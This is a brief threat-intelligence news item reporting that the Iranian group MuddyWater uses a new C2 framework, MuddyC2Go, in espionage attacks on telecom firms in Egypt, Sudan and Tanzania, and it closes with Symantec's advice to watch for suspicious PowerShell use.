The Iranian nation-state actor, MuddyWater, has been using a new command-and-control (C2) framework called MuddyC2Go in cyber espionage attacks on the telecommunications sector in Egypt, Sudan, and Tanzania. The activity, also tracked as Seedworm, involves a Golang-based tool replacing PhonyC2 and MuddyC3. MuddyWater, linked to Iran’s Ministry of Intelligence and Security, has been active since at least 2017, primarily targeting entities in the Middle East. The attacks involve the use of SimpleHelp, Venom Proxy, a custom keylogger, and other publicly available tools, aiming to evade detection and achieve strategic objectives. The latest intrusions occurred in November 2023. Symantec recommends organizations to be vigilant regarding the suspicious use of PowerShell on their networks.
